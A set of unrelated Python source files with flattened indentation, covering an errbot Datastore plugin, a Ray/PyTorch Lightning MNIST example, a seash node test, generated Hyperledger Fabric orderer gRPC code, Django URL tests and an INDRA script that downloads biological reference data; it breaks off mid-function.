def open(self, namespace: str) -> StorageBase:
return CloudDatastore(kind=namespace,
namespace=self.ds_namespace, # yes this is confusing but this is the mapping.
                              project=self.prj,
credentials=self.credentials)
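# Example errbot configuration (illustrative; keys correspond to the *_ENTRY
# constants above, and the project name / path are placeholders):
#   STORAGE = 'CloudDataStore'
#   STORAGE_CONFIG = {
#       'project': 'my-gcp-project',          # required
#       'accountfile': '/data/servacc.json',  # optional; defaults to BOT_DATA_DIR/servacc.json
#       'namespace': 'Errbot',                # optional Datastore namespace
#   }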
|
import argparse
# __import_begin__
import os
# Pytorch imports
import torch
from torch.optim import Adam
from torch.utils.data import DataLoader, random_split
from torch.nn import functional as F
from torchvision import transforms
from torchvision.datasets import MNIST
# Ray imports
from ray.util.sgd import TorchTrainer
from ray.util.sgd.torch import TrainingOperator
# PTL imports
from pytorch_lightning.core.lightning import LightningModule
# __import_end__
# __ptl_begin__
class LitMNIST(LightningModule):
# We take in an additional config parameter here. But this is not required.
def __init__(self, config):
super().__init__()
# mnist images are (1, 28, 28) (channels, width, height)
self.layer_1 = torch.nn.Linear(28 * 28, 128)
self.layer_2 = torch.nn.Linear(128, 256)
self.layer_3 = torch.nn.Linear(256, 10)
self.config = config
def forward(self, x):
batch_size, channels, width, height = x.size()
# (b, 1, 28, 28) -> (b, 1*28*28)
x = x.view(batch_size, -1)
x = self.layer_1(x)
x = torch.relu(x)
x = self.layer_2(x)
x = torch.relu(x)
x = self.layer_3(x)
x = torch.log_softmax(x, dim=1)
return x
def configure_optimizers(self):
return Adam(self.parameters(), lr=self.config["lr"])
def setup(self, stage):
# transforms for images
transform = transforms.Compose([
transforms.ToTensor(),
transforms.Normalize((0.1307, ), (0.3081, ))
])
# prepare transforms standard to MNIST
mnist_train = MNIST(
os.getcwd(), train=True, download=True, transform=transform)
self.mnist_train, self.mnist_val = random_split(
mnist_train, [55000, 5000])
def train_dataloader(self):
return DataLoader(
self.mnist_train, batch_size=self.config["batch_size"])
def val_dataloader(self):
return DataLoader(self.mnist_val, batch_size=self.config["batch_size"])
def training_step(self, batch, batch_idx):
x, y = batch
logits = self(x)
loss = F.nll_loss(logits, y)
return loss
def validation_step(self, batch, batch_idx):
x, y = batch
logits = self(x)
loss = F.nll_loss(logits, y)
_, predicted = torch.max(logits.data, 1)
num_correct = (predicted == y).sum().item()
num_samples = y.size(0)
return {"val_loss": loss.item(), "val_acc": num_correct / num_samples}
# __ptl_end__
# __train_begin__
def train_mnist(num_workers=1, use_gpu=False, num_epochs=5):
Operator = TrainingOperator.from_ptl(LitMNIST)
trainer = TorchTrainer(
training_operator_cls=Operator,
num_workers=num_workers,
config={
"lr": 1e-3,
"batch_size": 64
},
use_gpu=use_gpu,
use_tqdm=True,
)
for i in range(num_epochs):
stats = trainer.train()
print(stats)
print(trainer.validate())
print("Saving model checkpoint to ./model.pt")
trainer.save("./model.pt")
print("Model Checkpointed!")
trainer.shutdown()
print("success!")
# __train_end__
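# Illustrative command lines (the script name is hypothetical):
#   python mnist_ptl_example.py --num-workers 2 --num-epochs 5
#   python mnist_ptl_example.py --smoke-test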
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument(
"--address",
required=False,
type=str,
help="the address to use for Ray")
parser.add_argument(
"--num-workers",
"-n",
type=int,
default=1,
help="Sets number of workers for training.")
parser.add_argument(
"--use-gpu",
action="store_true",
default=False,
help="Enables GPU training")
parser.add_argument(
"--num-epochs",
type=int,
default=5,
help="How many epochs to train "
"for.")
parser.add_argument(
"--smoke-test",
action="store_true",
default=False,
help="Finish quickly for testing.")
args, _ = parser.parse_known_args()
import ray
if args.smoke_test:
ray.init(num_cpus=2)
args.num_epochs = 1
else:
ray.init(address=args.address)
train_mnist(
num_workers=args.num_workers,
use_gpu=args.use_gpu,
num_epochs=args.num_epochs)
|
"""
Uploads and runs a simple repy file to make sure no errors gets thrown, and
proceeds to download and remove the file from the node to test seash's file
recognition.
"""
#pragma out The specified file(s) could not be found. Please check the filename.
import seash
import sys
# Prevent printing to console by using test_results.txt as a text dump and redirecting output there
orig_stdout = sys.stdout
sys.stdout = open("test_results.txt", "w")
command_list = [
'loadkeys guest0',
'as guest0',
'browse',
'on %1',
'loadkeys guest0',
'as guest0',
'upload example.1.1.r2py sample_file',
'run example.1.1.r2py test_argument',
'show log',
'show files',
'start sample_file test_argument',
'show log',
'download sample_file',
'savestate testing_state'
]
seash.command_loop(command_list)
sys.stdout.close()
# Restore stdout so that UTF can catch errors that seash prints to the console
sys.stdout = orig_stdout
command_list = [
'loadkeys guest0',
'as guest0',
'loadstate testing_state',
'delete example.1.1.r2py',
'upload example.1.1.r2py',
'reset',
'download example.1.1.r2py'
]
seash.command_loop(command_list)
|
# Generated by the protocol buffer compiler. DO NOT EDIT!
# source: orderer/ab.proto
import sys
_b=sys.version_info[0]<3 and (lambda x:x) or (lambda x:x.encode('latin1'))
from google.protobuf import descriptor as _descriptor
from google.protobuf import message as _message
from google.protobuf import reflection as _reflection
from google.protobuf import symbol_database as _symbol_database
from google.protobuf import descriptor_pb2
# @@protoc_insertion_point(imports)
_sym_db = _symbol_database.Default()
from common import common_pb2 as common_dot_common__pb2
DESCRIPTOR = _descriptor.FileDescriptor(
name='orderer/ab.proto',
package='orderer',
syntax='proto3',
serialized_pb=_b('\n\x10orderer/ab.proto\x12\x07orderer\x1a\x13\x63ommon/common.proto\"3\n\x11\x42roadcastResponse\x12\x1e\n\x06Status\x18\x01 \x01(\x0e\x32\x0e.common.Status\"\xa8\x01\n\x08SeekInfo\x12*\n\x05Start\x18\x01 \x01(\x0e\x32\x1b.orderer.SeekInfo.StartType\x12\x17\n\x0fSpecifiedNumber\x18\x02 \x01(\x04\x12\x12\n\nWindowSize\x18\x03 \x01(\x04\x12\x0f\n\x07\x43hainID\x18\x04 \x01(\x0c\"2\n\tStartType\x12\n\n\x06NEWEST\x10\x00\x12\n\n\x06OLDEST\x10\x01\x12\r\n\tSPECIFIED\x10\x02\"!\n\x0f\x41\x63knowledgement\x12\x0e\n\x06Number\x18\x01 \x01(\x04\"o\n\rDeliverUpdate\x12\x33\n\x0f\x41\x63knowledgement\x18\x01 \x01(\x0b\x32\x18.orderer.AcknowledgementH\x00\x12!\n\x04Seek\x18\x02 \x01(\x0b\x32\x11.orderer.SeekInfoH\x00\x42\x06\n\x04Type\"Z\n\x0f\x44\x65liverResponse\x12\x1f\n\x05\x45rror\x18\x01 \x01(\x0e\x32\x0e.common.StatusH\x00\x12\x1e\n\x05\x42lock\x18\x02 \x01(\x0b\x32\r.common.BlockH\x00\x42\x06\n\x04Type2\x95\x01\n\x0f\x41tomicBroadcast\x12?\n\tBroadcast\x12\x10.common.Envelope\x1a\x1a.orderer.BroadcastResponse\"\x00(\x01\x30\x01\x12\x41\n\x07\x44\x65liver\x12\x16.orderer.DeliverUpdate\x1a\x18.orderer.DeliverResponse\"\x00(\x01\x30\x01\x42.Z,github.com/hyperledger/fabric/protos/ordererb\x06proto3')
,
dependencies=[common_dot_common__pb2.DESCRIPTOR,])
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
_SEEKINFO_STARTTYPE = _descriptor.EnumDescriptor(
name='StartType',
full_name='orderer.SeekInfo.StartType',
filename=None,
file=DESCRIPTOR,
values=[
_descriptor.EnumValueDescriptor(
name='NEWEST', index=0, number=0,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='OLDEST', index=1, number=1,
options=None,
type=None),
_descriptor.EnumValueDescriptor(
name='SPECIFIED', index=2, number=2,
options=None,
type=None),
],
containing_type=None,
options=None,
serialized_start=222,
serialized_end=272,
)
_sym_db.RegisterEnumDescriptor(_SEEKINFO_STARTTYPE)
_BROADCASTRESPONSE = _descriptor.Descriptor(
name='BroadcastResponse',
full_name='orderer.BroadcastResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='Status', full_name='orderer.BroadcastResponse.Status', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=50,
serialized_end=101,
)
_SEEKINFO = _descriptor.Descriptor(
name='SeekInfo',
full_name='orderer.SeekInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='Start', full_name='orderer.SeekInfo.Start', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='SpecifiedNumber', full_name='orderer.SeekInfo.SpecifiedNumber', index=1,
number=2, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='WindowSize', full_name='orderer.SeekInfo.WindowSize', index=2,
number=3, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='ChainID', full_name='orderer.SeekInfo.ChainID', index=3,
number=4, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=_b(""),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
_SEEKINFO_STARTTYPE,
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=104,
serialized_end=272,
)
_ACKNOWLEDGEMENT = _descriptor.Descriptor(
name='Acknowledgement',
full_name='orderer.Acknowledgement',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='Number', full_name='orderer.Acknowledgement.Number', index=0,
number=1, type=4, cpp_type=4, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=274,
serialized_end=307,
)
_DELIVERUPDATE = _descriptor.Descriptor(
name='DeliverUpdate',
full_name='orderer.DeliverUpdate',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='Acknowledgement', full_name='orderer.DeliverUpdate.Acknowledgement', index=0,
number=1, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='Seek', full_name='orderer.DeliverUpdate.Seek', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='Type', full_name='orderer.DeliverUpdate.Type',
index=0, containing_type=None, fields=[]),
],
serialized_start=309,
serialized_end=420,
)
_DELIVERRESPONSE = _descriptor.Descriptor(
name='DeliverResponse',
full_name='orderer.DeliverResponse',
filename=None,
file=DESCRIPTOR,
containing_type=None,
fields=[
_descriptor.FieldDescriptor(
name='Error', full_name='orderer.DeliverResponse.Error', index=0,
number=1, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
_descriptor.FieldDescriptor(
name='Block', full_name='orderer.DeliverResponse.Block', index=1,
number=2, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
options=None),
],
extensions=[
],
nested_types=[],
enum_types=[
],
options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='Type', full_name='orderer.DeliverResponse.Type',
index=0, containing_type=None, fields=[]),
],
serialized_start=422,
serialized_end=512,
)
_BROADCASTRESPONSE.fields_by_name['Status'].enum_type = common_dot_common__pb2._STATUS
_SEEKINFO.fields_by_name['Start'].enum_type = _SEEKINFO_STARTTYPE
_SEEKINFO_STARTTYPE.containing_type = _SEEKINFO
_DELIVERUPDATE.fields_by_name['Acknowledgement'].message_type = _ACKNOWLEDGEMENT
_DELIVERUPDATE.fields_by_name['Seek'].message_type = _SEEKINFO
_DELIVERUPDATE.oneofs_by_name['Type'].fields.append(
_DELIVERUPDATE.fields_by_name['Acknowledgement'])
_DELIVERUPDATE.fields_by_name['Acknowledgement'].containing_oneof = _DELIVERUPDATE.oneofs_by_name['Type']
_DELIVERUPDATE.oneofs_by_name['Type'].fields.append(
_DELIVERUPDATE.fields_by_name['Seek'])
_DELIVERUPDATE.fields_by_name['Seek'].containing_oneof = _DELIVERUPDATE.oneofs_by_name['Type']
_DELIVERRESPONSE.fields_by_name['Error'].enum_type = common_dot_common__pb2._STATUS
_DELIVERRESPONSE.fields_by_name['Block'].message_type = common_dot_common__pb2._BLOCK
_DELIVERRESPONSE.oneofs_by_name['Type'].fields.append(
_DELIVERRESPONSE.fields_by_name['Error'])
_DELIVERRESPONSE.fields_by_name['Error'].containing_oneof = _DELIVERRESPONSE.oneofs_by_name['Type']
_DELIVERRESPONSE.oneofs_by_name['Type'].fields.append(
_DELIVERRESPONSE.fields_by_name['Block'])
_DELIVERRESPONSE.fields_by_name['Block'].containing_oneof = _DELIVERRESPONSE.oneofs_by_name['Type']
DESCRIPTOR.message_types_by_name['BroadcastResponse'] = _BROADCASTRESPONSE
DESCRIPTOR.message_types_by_name['SeekInfo'] = _SEEKINFO
DESCRIPTOR.message_types_by_name['Acknowledgement'] = _ACKNOWLEDGEMENT
DESCRIPTOR.message_types_by_name['DeliverUpdate'] = _DELIVERUPDATE
DESCRIPTOR.message_types_by_name['DeliverResponse'] = _DELIVERRESPONSE
BroadcastResponse = _reflection.GeneratedProtocolMessageType('BroadcastResponse', (_message.Message,), dict(
DESCRIPTOR = _BROADCASTRESPONSE,
__module__ = 'orderer.ab_pb2'
# @@protoc_insertion_point(class_scope:orderer.BroadcastResponse)
))
_sym_db.RegisterMessage(BroadcastResponse)
SeekInfo = _reflection.GeneratedProtocolMessageType('SeekInfo', (_message.Message,), dict(
DESCRIPTOR = _SEEKINFO,
__module__ = 'orderer.ab_pb2'
# @@protoc_insertion_point(class_scope:orderer.SeekInfo)
))
_sym_db.RegisterMessage(SeekInfo)
Acknowledgement = _reflection.GeneratedProtocolMessageType('Acknowledgement', (_message.Message,), dict(
DESCRIPTOR = _ACKNOWLEDGEMENT,
__module__ = 'orderer.ab_pb2'
# @@protoc_insertion_point(class_scope:orderer.Acknowledgement)
))
_sym_db.RegisterMessage(Acknowledgement)
DeliverUpdate = _reflection.GeneratedProtocolMessageType('DeliverUpdate', (_message.Message,), dict(
DESCRIPTOR = _DELIVERUPDATE,
__module__ = 'orderer.ab_pb2'
# @@protoc_insertion_point(class_scope:orderer.DeliverUpdate)
))
_sym_db.RegisterMessage(DeliverUpdate)
DeliverResponse = _reflection.GeneratedProtocolMessageType('DeliverResponse', (_message.Message,), dict(
DESCRIPTOR = _DELIVERRESPONSE,
__module__ = 'orderer.ab_pb2'
# @@protoc_insertion_point(class_scope:orderer.DeliverResponse)
))
_sym_db.RegisterMessage(DeliverResponse)
DESCRIPTOR.has_options = True
DESCRIPTOR._options = _descriptor._ParseOptions(descriptor_pb2.FileOptions(), _b('Z,github.com/hyperledger/fabric/protos/orderer'))
import grpc
from grpc.beta import implementations as beta_implementations
from grpc.beta import interfaces as beta_interfaces
from grpc.framework.common import cardinality
from grpc.framework.interfaces.face import utilities as face_utilities
class AtomicBroadcastStub(object):
def __init__(self, channel):
"""Constructor.
Args:
channel: A grpc.Channel.
"""
self.Broadcast = channel.stream_stream(
'/orderer.AtomicBroadcast/Broadcast',
request_serializer=common_dot_common__pb2.Envelope.SerializeToString,
response_deserializer=BroadcastResponse.FromString,
)
self.Deliver = channel.stream_stream(
'/orderer.AtomicBroadcast/Deliver',
request_serializer=DeliverUpdate.SerializeToString,
response_deserializer=DeliverResponse.FromString,
)
class AtomicBroadcastServicer(object):
def Broadcast(self, request_iterator, context):
"""broadcast receives a reply of Acknowledgement for each common.Envelope in order, indicating success or type of failure
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Deliver(self, request_iterator, context):
"""deliver first requires an update containing a seek message, then a stream of block replies is received.
The receiver may choose to send an Acknowledgement for any block number it receives, however Acknowledgements must never be more than WindowSize apart
To avoid latency, clients will likely acknowledge before the WindowSize has been exhausted, preventing the server from stopping and waiting for an Acknowledgement
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_AtomicBroadcastServicer_to_server(servicer, server):
rpc_method_handlers = {
'Broadcast': grpc.stream_stream_rpc_method_handler(
servicer.Broadcast,
request_deserializer=common_dot_common__pb2.Envelope.FromString,
response_serializer=BroadcastResponse.SerializeToString,
),
'Deliver': grpc.stream_stream_rpc_method_handler(
servicer.Deliver,
request_deserializer=DeliverUpdate.FromString,
response_serializer=DeliverResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'orderer.AtomicBroadcast', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
class BetaAtomicBroadcastServicer(object):
def Broadcast(self, request_iterator, context):
"""broadcast receives a reply of Acknowledgement for each common.Envelope in order, indicating success or type of failure
"""
context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)
def Deliver(self, request_iterator, context):
"""deliver first requires an update containing a seek message, then a stream of block replies is received.
The receiver may choose to send an Acknowledgement for any block number it receives, however Acknowledgements must never be more than WindowSize apart
To avoid latency, clients will likely acknowledge before the WindowSize has been exhausted, preventing the server from stopping and waiting for an Acknowledgement
"""
context.code(beta_interfaces.StatusCode.UNIMPLEMENTED)
class BetaAtomicBroadcastStub(object):
def Broadcast(self, request_iterator, timeout, metadata=None, with_call=False, protocol_options=None):
"""broadcast receives a reply of Acknowledgement for each common.Envelope in order, indicating success or type of failure
"""
raise NotImplementedError()
def Deliver(self, request_iterator, timeout, metadata=None, with_call=False, protocol_options=None):
"""deliver first requires an update containing a seek message, then a stream of block replies is received.
The receiver may choose to send an Acknowledgement for any block number it receives, however Acknowledgements must never be more than WindowSize apart
To avoid latency, clients will likely acknowledge before the WindowSize has been exhausted, preventing the server from stopping and waiting for an Acknowledgement
"""
raise NotImplementedError()
def beta_create_AtomicBroadcast_server(servicer, pool=None, pool_size=None, default_timeout=None, maximum_timeout=None):
request_deserializers = {
('orderer.AtomicBroadcast', 'Broadcast'): common_dot_common__pb2.Envelope.FromString,
('orderer.AtomicBroadcast', 'Deliver'): DeliverUpdate.FromString,
}
response_serializers = {
('orderer.AtomicBroadcast', 'Broadcast'): BroadcastResponse.SerializeToString,
('orderer.AtomicBroadcast', 'Deliver'): DeliverResponse.SerializeToString,
}
method_implementations = {
('orderer.AtomicBroadcast', 'Broadcast'): face_utilities.stream_stream_inline(servicer.Broadcast),
('orderer.AtomicBroadcast', 'Deliver'): face_utilities.stream_stream_inline(servicer.Deliver),
}
server_options = beta_implementations.server_options(request_deserializers=request_deserializers, response_serializers=response_serializers, thread_pool=pool, thread_pool_size=pool_size, default_timeout=default_timeout, maximum_timeout=maximum_timeout)
return beta_implementations.server(method_implementations, options=server_options)
def beta_create_AtomicBroadcast_stub(channel, host=None, metadata_transformer=None, pool=None, pool_size=None):
request_serializers = {
('orderer.AtomicBroadcast', 'Broadcast'): common_dot_common__pb2.Envelope.SerializeToString,
('orderer.AtomicBroadcast', 'Deliver'): DeliverUpdate.SerializeToString,
}
response_deserializers = {
('orderer.AtomicBroadcast', 'Broadcast'): BroadcastResponse.FromString,
('orderer.AtomicBroadcast', 'Deliver'): DeliverResponse.FromString,
}
cardinalities = {
'Broadcast': cardinality.Cardinality.STREAM_STREAM,
'Deliver': cardinality.Cardinality.STREAM_STREAM,
}
stub_options = beta_implementations.stub_options(host=host, metadata_transformer=metadata_transformer, request_serializers=request_serializers, response_deserializers=response_deserializers, thread_pool=pool, thread_pool_size=pool_size)
return beta_implementations.dynamic_stub(channel, 'orderer.AtomicBroadcast', cardinalities, options=stub_options)
# @@protoc_insertion_point(module_scope)
|
"""Create your test for the appointment DRF urls."""
import pytest
from django.urls import resolve, reverse
from onebarangay_psql.appointment.models import Appointment
pytestmark = pytest.mark.django_db
class TestAppointmentViewSetUrls:
"""Test DRF URls for AnnouncementViewSet."""
def test_appointment_detail(self, appointment: Appointment):
"""Test appointment 'detail' drf url to reverse and resolve.
Args:
appointment (Appointment): Appointment object to test.
"""
assert (
reverse("api:appointment-detail", kwargs={"pk": appointment.pk})
== f"/api/appointment/{appointment.pk}/"
)
assert (
resolve(f"/api/appointment/{appointment.pk}/").view_name
== "api:appointment-detail"
)
def test_appointment_list(self):
"""Test appointment 'list' drf url to reverse and resolve."""
assert reverse("api:appointment-list") == "/api/appointment/"
assert resolve("/api/appointment/").view_name == "api:appointment-list"
|
from __future__ import absolute_import, print_function, unicode_literals
from builtins import dict, str
import os
import gzip
import pandas
import rdflib
from indra.util import read_unicode_csv, write_unicode_csv
try:
from urllib import urlretrieve
except ImportError:
from urllib.request import urlretrieve
import logging
import requests
from indra.preassembler.make_cellular_component_hierarchy import \
get_cellular_components
from indra.preassembler.make_cellular_component_hierarchy import \
main as make_ccomp_hierarchy
from indra.preassembler.make_entity_hierarchy import \
main as make_ent_hierarchy
from indra.preassembler.make_activity_hierarchy import \
main as make_act_hierarchy
from indra.preassembler.make_modification_hierarchy import \
main as make_mod_hierarchy
path = os.path.dirname(__file__)
logging.basicConfig(format='%(levelname)s: indra/%(name)s - %(message)s',
level=logging.INFO)
logger = logging.getLogger('update_resources')
logging.getLogger('urllib3').setLevel(logging.ERROR)
logging.getLogger('requests').setLevel(logging.ERROR)
logger.setLevel(logging.INFO)
def load_from_http(url):
logger.info('Downloading %s' % url)
res = requests.get(url)
if res.status_code != 200:
logger.error('Failed to download "%s"' % url)
return
return res.content
def save_from_http(url, fname):
content = load_from_http(url)
if content is None:
return
logger.info('Saving into %s' % fname)
with open(fname, 'wb') as fh:
fh.write(content)
def update_hgnc_entries():
logger.info('--Updating HGNC entries-----')
url = 'http://tinyurl.com/y83dx5s6'
fname = os.path.join(path, 'hgnc_entries.tsv')
save_from_http(url, fname)
def update_kinases():
logger.info('--Updating kinase list------')
url = 'http://www.uniprot.org/uniprot/?' + \
'sort=entry_name&desc=no&compress=no&query=database:(type:' + \
'interpro%20ipr011009)%20AND%20reviewed:yes%20AND%20organism:' + \
'%22Homo%20sapiens%20(Human)%20[9606]%22&fil=&force=no' + \
'&format=tab&columns=id,genes(PREFERRED),organism-id,entry%20name'
fname = os.path.join(path, 'kinases.tsv')
save_from_http(url, fname)
def update_uniprot_entries():
logger.info('--Updating UniProt entries--')
url = 'http://www.uniprot.org/uniprot/?' + \
'sort=id&desc=no&compress=no&query=reviewed:yes&' + \
'format=tab&columns=id,genes(PREFERRED),' + \
'entry%20name,database(RGD),database(MGI)'
reviewed_entries = load_from_http(url)
url = 'http://www.uniprot.org/uniprot/?' + \
'sort=id&desc=no&compress=no&query=reviewed:no&fil=organism:' + \
'%22Homo%20sapiens%20(Human)%20[9606]%22&' + \
'format=tab&columns=id,genes(PREFERRED),entry%20name,' + \
'database(RGD),database(MGI)'
unreviewed_human_entries = load_from_http(url)
    if reviewed_entries is None or unreviewed_human_entries is None:
        return
unreviewed_human_entries = unreviewed_human_entries.decode('utf-8')
reviewed_entries = reviewed_entries.decode('utf-8')
lines = reviewed_entries.strip('\n').split('\n')
lines += unreviewed_human_entries.strip('\n').split('\n')[1:]
# At this point, we need to clean up the gene names.
    logger.info('Processing UniProt entries list')
for i, line in enumerate(lines):
if i == 0:
continue
terms = line.split('\t')
# If there are multiple gene names, take the first one
gene_names = terms[1].split(';')
terms[1] = gene_names[0]
# Join the line again after the change
lines[i] = '\t'.join(terms)
# Join all lines into a single string
full_table = '\n'.join(lines)
fname = os.path.join(path, 'uniprot_entries.tsv')
    logger.info('Saving into %s' % fname)
with open(fname, 'wb') as fh:
fh.write(full_table.encode('utf-8'))
def update_uniprot_sec_ac():
logger.info('--Updating UniProt secondary accession--')
url = 'ftp://ftp.uniprot.org/pub/databases/uniprot/knowledgebase/' + \
'docs/sec_ac.txt'
logger.info('Downloading %s' % url)
fname = os.path.join(path, 'uniprot_sec_ac.txt')
urlretrieve(url, fname)
def update_uniprot_subcell_loc():
# TODO: This file could be stored as a tsv instead after some processing
logger.info('--Updating UniProt subcellular location--')
url = 'http://www.uniprot.org/locations/?' + \
'%20sort=&desc=&compress=no&query=&force=no&format=tab&columns=id'
fname = os.path.join(path, 'uniprot_subcell_loc.tsv')
save_from_http(url, fname)
def update_chebi_entries():
logger.info('--Updating ChEBI entries----')
url = 'ftp://ftp.ebi.ac.uk/pub/databases/chebi/' + \
'Flat_file_tab_delimited/reference.tsv.gz'
fname = os.path.join(path, 'reference.tsv.gz')
urlretrieve(url, fname)
with gzip.open(fname, 'rb') as fh:
logger.info('Loading %s' % fname)
df = pandas.read_csv(fh, sep='\t', index_col=None,
parse_dates=True, encoding='latin-1')
# Save PubChem mapping
fname = os.path.join(path, 'chebi_to_pubchem.tsv')
logger.info('Saving into %s' % fname)
    df_pubchem = df[df['REFERENCE_DB_NAME'] == 'PubChem'].copy()
df_pubchem.sort_values(['COMPOUND_ID', 'REFERENCE_ID'], ascending=True,
inplace=True)
df_pubchem.to_csv(fname, sep='\t', columns=['COMPOUND_ID', 'REFERENCE_ID'],
header=['CHEBI', 'PUBCHEM'], index=False)
# Process PubChem mapping to eliminate SID rows and strip CID: prefix
# If the second column of the row starts with SID:, ignore the row
# If the second column of the row starts with CID:, strip out the CID prefix
# Otherwise, include the row unchanged
original_rows = read_unicode_csv(fname, '\t')
new_rows = []
for original_row in original_rows:
if original_row[1].startswith('CID:'):
new_row = original_row
new_row[1] = new_row[1][5:] # Strip out CID:
new_rows.append(new_row)
elif original_row[1].startswith('SID:'):
# Skip SID rows
continue
else:
            # Include other rows unchanged
new_rows.append(original_row)
write_unicode_csv(fname, new_rows, '\t')
# Save ChEMBL mapping
fname = os.path.join(path, 'chebi_to_chembl.tsv')
logger.info('Saving into %s' % fname)
    df_chembl = df[df['REFERENCE_DB_NAME'] == 'ChEMBL'].copy()
df_chembl.sort_values(['COMPOUND_ID', 'REFERENCE_ID'], ascending=True,
inplace=True)
df_chembl.to_csv(fname, sep='\t', columns=['COMPOUND_ID', 'REFERENCE_ID'],
header=['CHEBI', 'CHEMBL'], index=False)
def update_cas_to_chebi():
logger.info('--Updating CAS to ChEBI entries----')
url = 'ftp://ftp.ebi.ac.uk/pub/databases/chebi/' + \
'Flat_file_tab_delimited/database_accession.tsv'
fname = os.path.join(path, 'database_accession.tsv')
urlretrieve(url, fname)
with open(fname, 'rb') as fh:
logger.info('Loading %s' % fname)
        df = pandas.read_csv(fh, sep='\t', index_col=None)
fname = os.path.join(path, 'cas_to_chebi.tsv')
logger.info('Saving into %s' % fname)
    df_cas = df[df['TYPE'] == 'CAS Registry Number'].copy()
df_cas.sort_values(['ACCESSION_NUMBER', 'COMPOUND_ID'], ascending=True,
inplace=True)
# Here we need to map to primary ChEBI IDs
with open(os.path.join(path, 'chebi_to_primary.tsv'), 'rb') as fh:
        df_prim = pandas.read_csv(fh, sep='\t', index_col=None)
mapping = {s: p for s, p in zip(df_prim['Secondary'].tolist(),
df_prim['Primary'].tolist())}
df_cas.COMPOUND_ID.replace(mapping, inplace=True)
df_cas.drop_duplicates(subset=['ACCESSION_NUMBER', 'COMPOUND_ID'],
inplace=True)
df_cas.to_csv(fname, sep='\t',
columns=['ACCESSION_NUMBER', 'COMPOUND_ID'],
header=['CAS', 'CHEBI'], index=False)
def update_chebi_primary_map():
logger.info('--Updating ChEBI primary map entries----')
url = 'ftp://ftp.ebi.ac.uk/pub/databases/chebi/' + \
'Flat_file_tab_delimited/compounds.tsv.gz'
fname = os.path.join(path, 'compounds.tsv.gz')
urlretrieve(url, fname)
with gzip.open(fname, 'rb') as fh:
logger.info('Loading %s' % fname)
df = pandas.read_csv(fh, sep='\t', index_col=None,
parse_dates=True, dtype='str')
fname = os.path.join(path, 'chebi_to_primary.tsv')
logger.info('Saving into %s' % fname)
df = df[df['PARENT_ID'].notna()]
df.replace('CHEBI:([0-9]+)', r'\1', inplace=True, regex=True)
df.sort_values(['CHEBI_ACCESSION', 'PARENT_ID'], ascending=True,
inplace=True)
df.drop_duplicates(subset=['CHEBI_ACCESSION', 'PARENT_ID'], inplace=True)
df.to_csv(fname, sep='\t',
columns=['CHEBI_ACCESSION', 'PARENT_ID'],
header=['Secondary', 'Primary'], index=False)
def update_cellular_components():
logger.info('--Updating GO cellular components----')
url = 'http://purl.obolibrary.org/obo/go.owl'
fname = os.path.join(path, '../../data/go.owl')
save_from_http(url, fname)
g = rdflib.Graph()
g.parse(os.path.abspath(fname))
component_map, component_part_map = get_cellular_components(g)
fname = os.path.join(path, 'cellular_components.tsv')
logger.info('Saving into %s' % fname)
with open(fname, 'wb') as fh:
fh.write('id\tname\n'.encode('utf-8'))
for comp_id, comp_name in sorted(component_map.items(),
key=lambda x: x[0]):
fh.write(('%s\t%s\n' % (comp_id, comp_name)).encode('utf-8'))
def update_bel_chebi_map():
logger.info('--Updating BEL ChEBI map----')
id_lines = []
